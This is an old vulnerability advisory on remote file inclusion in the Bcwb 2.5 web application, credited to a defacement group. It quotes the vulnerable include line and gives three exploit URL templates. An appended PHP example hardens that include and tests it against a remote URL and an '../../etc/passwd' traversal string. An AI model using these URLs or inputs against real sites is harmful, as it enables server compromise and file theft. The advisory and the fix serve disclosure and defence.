Multiple Remote File Include

2006-10-31T00:00:00
ID SECURITYVULNS:DOC:14867
Type securityvulns
Reporter Securityvulns
Modified 2006-10-31T00:00:00

Description

################# Firewall
  Bcwb 2.5 - Multiple File Include by Firewall
         Latin  American  Defacers
           BuG FounD by Firewall

Affected Application:

                Bcwb 2.5

Source Code:

     http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

Code:

   if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

ExPloit :

http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]

GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.

################# Firewall
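
A hardened form of the include quoted under "Code:", given as an added example that is not part of the advisory or of Bcwb: the base directory is fixed server-side instead of coming from $root_path_admin, and the language name is validated and canonicalised before it is included. The function name resolve_language_file, the temporary directory layout and the sample inputs are assumptions constructed for the demonstration; the listed URLs also imply that request parameters can populate $root_path_admin (for example through register_globals), which is an assumption here as well.

```php
<?php
// Added example, not Bcwb code: a hardened form of the include shown in the advisory.
// The directory layout and the function name are assumptions made for the demonstration.

/**
 * Map a language code to <baseDir>/lang/<code>.inc.php, or return null.
 * $baseDir must be a server-side constant, never a value taken from the request.
 */
function resolve_language_file($baseDir, $language)
{
    // Accept only short language codes: no slashes, dots, URL schemes or NUL bytes.
    if (!is_string($language) || !preg_match('/\A[a-z]{2,3}(_[A-Z]{2})?\z/', $language)) {
        return null;
    }
    $langDir = realpath($baseDir . DIRECTORY_SEPARATOR . 'lang');
    if ($langDir === false) {
        return null;
    }
    // Canonicalise, then confirm the file really sits inside lang/.
    $file = realpath($langDir . DIRECTORY_SEPARATOR . $language . '.inc.php');
    $prefix = $langDir . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo tree standing in for the application's admin directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'bcwb_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'lang', 0700, true);
file_put_contents($base . '/lang/en.inc.php', "<?php \$lang_loaded = 'en';\n");

// Constructed inputs: one valid code, one remote URL, one traversal attempt.
foreach (array('en', 'http://example.invalid/x', '../../etc/passwd') as $candidate) {
    $file = resolve_language_file($base, $candidate);
    if ($file === null) {
        // In an application: log server-side and fail closed; the demo only prints.
        echo 'rejected: ' . var_export($candidate, true) . "\n";
        continue;
    }
    require $file;
    echo "included language file for '$lang_loaded'\n";
}

unlink($base . '/lang/en.inc.php');
rmdir($base . '/lang');
rmdir($base);
```

In a deployment the base directory would be derived from the script's own location (for example `__DIR__`) rather than a temporary directory.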